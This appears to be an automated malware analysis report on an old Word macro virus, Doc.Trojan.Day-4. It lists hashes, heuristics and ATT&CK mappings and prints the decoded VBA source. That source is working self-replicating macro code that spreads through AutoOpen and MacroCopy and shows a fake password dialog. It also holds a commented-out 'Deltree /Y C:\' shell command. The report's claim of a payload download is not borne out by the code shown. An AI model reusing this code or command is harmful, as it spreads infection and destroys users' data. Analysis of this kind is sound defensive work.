Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c1076c6a48b91ab…

MALICIOUS

Office (OLE)

41.5 KB Created: 2000-01-11 20:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 70a7b94b6e193f8e601087959e078ccb SHA-1: b69113e4db462f3340ed22e24b5a46f793137e34 SHA-256: 3c1076c6a48b91abd0d9c9088d695aa8f00a61d8732a37e104fe17f7da133db1
268 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious Office documents. The macro attempts to display a dialog box labeled 'Validation Check' with a dropdown list and a picture, likely as a lure to trick the user into executing further malicious actions. The presence of a Shell() call within the VBA code strongly suggests the macro is intended to download and execute a secondary payload.

Heuristics 6

  • ClamAV: Doc.Trojan.Day-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Day-4
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3386 bytes
SHA-256: 3a725709d2fdde8a56ce95eabcfaa95379d8ea4abfff383fce4bd90f6488ed2b
Detection
ClamAV: Doc.Trojan.Day-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoopen"

Public Sub MAIN()
Dim thisday
Dim DayFlag
Dim Button
Dim Flag$
Dim False_
ReDim NameList__$(3)
WordBasic.DisableInput
NameList__$(0) = "µçÄÔ²¿"
NameList__$(1) = "IBM"
NameList__$(2) = "MicroSoft"
NameList__$(3) = "Compaq"
thisday = WordBasic.WeekDay(WordBasic.Now()) - 1
'MsgBox Str$(thisday)
    If WordBasic.CountWindows() = 0 Then
         WordBasic.FileNew
         WordBasic.SetDocumentVar "NewFlag", "True"
    Else
         WordBasic.SetDocumentVar "NewFlag", "False"
    End If
    WordBasic.SetDocumentVar "CloseFlag", "True"
WordBasic.BeginDialog 320, 144, "Validation Check", "AutoOpen.MyFunc"
    WordBasic.OKButton 170, 108, 88, 21
    WordBasic.DropListBox 106, 33, 160, 38, NameList__$(), "DropListBox1"
    WordBasic.Text 20, 33, 68, 13, "UserName£º", "Text1"
'   Text 19, 62, 48, 13, "UserId£º", .Text2
'   TextBox 106, 60, 160, 18, .TextBox1
    WordBasic.Text 119, 8, 78, 13, "Certification", "Text3"
    WordBasic.Picture 3, 88, 118, 54, "fig", 1, "Picture1"
WordBasic.EndDialog

Dim LoginDlg As Object: Set LoginDlg = WordBasic.CurValues.UserDialog
DayFlag = WordBasic.Today() > WordBasic.DateSerial(97, 7, 20)
If ((thisday = 3) Or (thisday = 5)) And DayFlag Then Button = WordBasic.Dialog.UserDialog(LoginDlg)
Flag$ = WordBasic.[GetDocumentVar$]("CloseFlag")
If (DayFlag = False_) Then Flag$ = "False"
'MsgBox Flag$ + " "
If WordBasic.[FileNameFromWindow$]() <> "" Then
On Error GoTo -1: On Error GoTo Infest
WordBasic.MacroCopy WordBasic.[FileNameFromWindow$]() + ":AutoOpen", "AutoOpen"
Infest: On Error GoTo -1: On Error GoTo NInfest
WordBasic.MacroCopy "AutoOpen", WordBasic.[FileNameFromWindow$]() + ":AutoOpen"
NInfest:
    If (thisday <> 3) And (thisday <> 5) Then
    WordBasic.FileSaveAll 1, 1
    Flag$ = "False"
    End If
End If
If Flag$ = "True" Then ExitWord
End Sub


Private Function MyFunc(identifier$, action, suppvalue)
    Select Case action
Case 1     'The Dialog Displayed
Case 2     ' the user Selects a Control
    If identifier$ = "DropListBox1" Then
    Dim Password$
    Password$ = "0"
    On Error Resume Next
    Password$ = WordBasic.[InputBox$]("Input your Password")
       If (WordBasic.DlgValue("DropListBox1") = 0) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
       ElseIf (WordBasic.DlgValue("DropListBox1") = 1) And (WordBasic.Val(Password$) <> 20300) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
       ElseIf (WordBasic.DlgValue("DropListBox1") = 2) And (WordBasic.Val(Password$) <> 36000) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
       ElseIf (WordBasic.DlgValue("DropListBox1") = 3) And (WordBasic.Val(Password$) <> 40004) Then
    WordBasic.SetDocumentVar "CloseFlag", "True"
Else
    WordBasic.SetDocumentVar "CloseFlag", "False"
End If
End If
Case 3      ' Text Changed
    'MsgBox LoginDlg.TextBox2
Case Else
End Select
End Function

Private Sub ExitWord()
'Shell Environ$("COMSPEC") + "/c Deltree /Y C:\"
WordBasic.SetTemplateDirty
WordBasic.FileSaveAll 1, 1
WordBasic.AppClose
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.